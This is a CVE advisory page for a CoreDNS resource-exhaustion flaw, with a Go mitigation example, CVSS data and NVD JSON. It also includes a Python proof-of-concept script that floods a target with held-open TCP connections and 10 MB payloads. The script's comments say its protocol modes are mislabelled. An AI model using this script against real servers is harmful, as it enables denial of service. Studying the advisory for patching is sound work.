Security Vulnerability Report
CVE-2025-68151 CVSS 7.5 HIGH

CVE-2025-68151

Published: 2026-01-08 16:16:00
Last Modified: 2026-01-22 13:47:51

Description

CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch.
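The three controls the advisory names (a cap on concurrent connections, a cap on streams, and a bound on request body size) are easiest to see in a small Go DNS-over-HTTPS listener. The code below is an added example written for this page; it is not CoreDNS code and not the 1.14.0 patch. The listener wrapper, the handler, the loopback port and the limit values are assumptions chosen for illustration. It contrasts the unbounded io.ReadAll(r.Body) pattern with http.MaxBytesReader, and wraps the net.Listener in a semaphore so connections past the cap wait instead of each costing a goroutine and buffers.

```go
package main

import (
	"errors"
	"io"
	"log"
	"net"
	"net/http"
	"sync"
	"time"
)

// Limits are assumptions for this example, not CoreDNS's values.
const (
	maxConns      = 256   // simultaneous TCP connections the listener will hold
	maxDNSMessage = 65535 // DNS over TCP and DoH frame messages with a 16-bit length
)

// limitListener caps open connections with a buffered-channel semaphore;
// without a cap, each idle connection an attacker holds open costs the
// server a goroutine and its buffers for as long as it stays open.
type limitListener struct {
	net.Listener
	sem chan struct{}
}

func newLimitListener(l net.Listener, n int) *limitListener {
	return &limitListener{Listener: l, sem: make(chan struct{}, n)}
}

// tryAcquire takes a slot without blocking; false means the cap is reached.
func (l *limitListener) tryAcquire() bool {
	select {
	case l.sem <- struct{}{}:
		return true
	default:
		return false
	}
}

func (l *limitListener) release() { <-l.sem }
// Accept blocks until a slot is free and returns the slot when the conn closes.
func (l *limitListener) Accept() (net.Conn, error) {
	l.sem <- struct{}{}
	c, err := l.Listener.Accept()
	if err != nil {
		l.release()
		return nil, err
	}
	return &limitConn{Conn: c, release: l.release}, nil
}

type limitConn struct {
	net.Conn
	release func()
	once    sync.Once
}

func (c *limitConn) Close() error {
	err := c.Conn.Close()
	c.once.Do(c.release) // release exactly once even if Close is called twice
	return err
}

// dohHandler answers DNS-over-HTTPS POST queries. The unbounded pattern is a
// bare io.ReadAll(r.Body); wrapping the body in http.MaxBytesReader fails the
// request with 413 after at most maxDNSMessage+1 bytes have been read.
func dohHandler(w http.ResponseWriter, r *http.Request) {
	r.Body = http.MaxBytesReader(w, r.Body, maxDNSMessage)
	msg, err := io.ReadAll(r.Body)
	var tooBig *http.MaxBytesError
	if errors.As(err, &tooBig) {
		http.Error(w, "DNS message too large", http.StatusRequestEntityTooLarge)
		return
	}
	if err != nil || len(msg) < 12 { // a DNS header is 12 bytes
		http.Error(w, "malformed DNS message", http.StatusBadRequest)
		return
	}
	// Stub resolver: echo the query with QR=1 and RCODE=REFUSED (5).
	resp := append([]byte(nil), msg...)
	resp[2] |= 0x80
	resp[3] = resp[3]&0xF0 | 5
	w.Header().Set("Content-Type", "application/dns-message")
	w.Write(resp)
}

func main() {
	base, err := net.Listen("tcp", "127.0.0.1:8053")
	if err != nil {
		log.Fatal(err)
	}
	srv := &http.Server{
		Handler:           http.HandlerFunc(dohHandler),
		ReadHeaderTimeout: 5 * time.Second, // bounds how long a slow client can hold a slot
	}
	// Plain HTTP on loopback for the demo; a real DoH listener would use ServeTLS.
	log.Fatal(srv.Serve(newLimitListener(base, maxConns)))
}
```

The connection cap and body bound cover two of the three dimensions in the description. The third, per-connection stream limits, is set at the protocol layer rather than in a handler: in grpc-go through the grpc.MaxConcurrentStreams and grpc.MaxRecvMsgSize server options, and for HTTP/3 through the QUIC library's incoming-stream limit. Those are the server-option knobs a reviewer should look for when auditing a listener for the class of issue this CVE describes.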

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Secondary CVSS 4.0 Score
6.6 MEDIUM (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U)
Weakness
CWE-770 (Allocation of Resources Without Limits or Throttling)

Configurations (Affected Products)

cpe:2.3:a:coredns.io:coredns:*:*:*:*:*:*:*:* - VULNERABLE
CoreDNS < 1.14.0 (gRPC server)
CoreDNS < 1.14.0 (HTTPS server)
CoreDNS < 1.14.0 (HTTP/3 server)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-68151 PoC - CoreDNS Resource Exhaustion DoS
# Affected: CoreDNS < 1.14.0 (gRPC, HTTPS, HTTP/3 servers)
# Usage: python3 cve-2025-68151-poc.py <target_ip> <port> [-c COUNT] [-t http3|grpc|https]
#
# What this script actually does: it opens COUNT raw TCP connections, writes
# 10 MB of filler on each and holds them open for five minutes. It performs
# no TLS handshake and speaks neither HTTP/2 (gRPC) nor QUIC (HTTP/3), so a
# real listener rejects the bytes at the protocol layer, and the "http3"
# mode cannot reach a UDP/QUIC socket over TCP at all. All three modes share
# one code path and exercise only the connection-count dimension of the
# advisory, not the stream or message-size limits it describes.

import argparse
import asyncio


async def create_connection(target: str, port: int, conn_id: int):
    """Open one raw TCP connection, push 10 MB of filler, then hold it open."""
    try:
        reader, writer = await asyncio.wait_for(
            asyncio.open_connection(target, port),
            timeout=5,
        )
        print(f"[+] Connection {conn_id} established to {target}:{port}")

        # Oversized "request body": plain filler bytes, not a valid request
        oversized_data = b'A' * (10 * 1024 * 1024)  # 10MB
        writer.write(oversized_data)
        await writer.drain()

        # Keep connection alive so the server keeps its per-connection state
        await asyncio.sleep(300)

        writer.close()
        await writer.wait_closed()
    except Exception as e:
        print(f"[-] Connection {conn_id} failed: {e}")


async def attack_http3(target: str, port: int, count: int):
    """Staggered TCP flood (also used for the 'https' mode)."""
    tasks = []
    for i in range(count):
        tasks.append(asyncio.create_task(create_connection(target, port, i)))
        await asyncio.sleep(0.01)  # Stagger connections
    await asyncio.gather(*tasks, return_exceptions=True)


async def attack_grpc(target: str, port: int, count: int):
    """Unstaggered TCP flood; gRPC runs over HTTP/2, which this script does not frame."""
    tasks = [asyncio.create_task(create_connection(target, port, i)) for i in range(count)]
    await asyncio.gather(*tasks, return_exceptions=True)


async def main():
    parser = argparse.ArgumentParser(description='CVE-2025-68151 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('port', type=int, help='Target port')
    parser.add_argument('-c', '--count', type=int, default=100,
                        help='Number of concurrent connections')
    parser.add_argument('-t', '--type', choices=['http3', 'grpc', 'https'],
                        default='https', help='Protocol type')
    args = parser.parse_args()

    print(f"[*] Starting CVE-2025-68151 attack against {args.target}:{args.port}")
    print(f"[*] Creating {args.count} concurrent connections...")

    if args.type == 'grpc':
        await attack_grpc(args.target, args.port, args.count)
    else:
        # 'http3' and 'https' both use the staggered flood
        await attack_http3(args.target, args.port, args.count)

    print("[*] Attack completed")


if __name__ == '__main__':
    asyncio.run(main())

References

https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812 (Patch)
https://github.com/coredns/coredns/pull/7490 (Issue Tracking, Patch)
https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2 (Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-68151",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T16:15:59.847",
    "lastModified": "2026-01-22T13:47:50.683",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "UNREPORTED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-770"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:coredns.io:coredns:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.14.0",
                "matchCriteriaId": "0C779EB8-052B-4A23-982F-0BEF2D0F0443"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/coredns/coredns/pull/7490",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}